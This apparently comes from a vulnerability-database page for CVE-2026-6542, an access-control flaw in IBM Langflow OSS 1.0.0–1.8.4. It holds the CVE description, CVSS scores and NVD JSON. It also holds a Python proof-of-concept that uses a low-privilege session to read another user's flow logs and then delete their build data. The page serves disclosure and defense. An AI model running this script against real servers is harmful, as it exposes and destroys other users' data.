CVE-2026-6542

Description

IBM Langflow OSS 1.0.0 through 1.8.4 could allow any user to supply a flow_id to read transaction logs and vertex build data belonging to other users, and to delete persisted vertex build data for another user's flow.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:* - VULNERABLE

IBM Langflow OSS 1.0.0 - 1.8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL configuration
target_host = "http://vulnerable-langflow-server:5000"
attacker_cookie = "session_id_of_low_priv_user"
victim_flow_id = "uuid_of_victim_flow"

headers = {
    "Cookie": f"session={attacker_cookie}",
    "Content-Type": "application/json"
}

# 1. Exploit: Read transaction logs and vertex build data
# The API fails to check if the attacker owns victim_flow_id
read_logs_url = f"{target_host}/api/v1/flows/{victim_flow_id}/logs"
response = requests.get(read_logs_url, headers=headers)

if response.status_code == 200:
    print("[+] Successfully exfiltrated victim's transaction logs:")
    print(response.text)
else:
    print("[-] Failed to read logs")

# 2. Exploit: Delete persisted vertex build data
# The API allows deletion of data owned by another user
delete_data_url = f"{target_host}/api/v1/flows/{victim_flow_id}/data"
del_response = requests.delete(delete_data_url, headers=headers)

if del_response.status_code == 200:
    print("[+] Successfully deleted victim's persisted vertex build data")
else:
    print("[-] Failed to delete data")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6542
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6542
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6542/
[4] VulDB https://vuldb.com/cve/CVE-2026-6542
[5] https://www.ibm.com/support/pages/node/7270886

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6542", "sourceIdentifier": "[email protected]", "published": "2026-04-30T22:16:26.340", "lastModified": "2026-05-04T18:21:23.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Langflow OSS 1.0.0 through 1.8.4 could allow any user to supply a flow_id to read transaction logs and vertex build data belonging to other users, and to delete persisted vertex build data for another user's flow."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.9.0", "matchCriteriaId": "2DFDBBCF-1947-4468-9C94-5CF03650A12D"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7270886", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}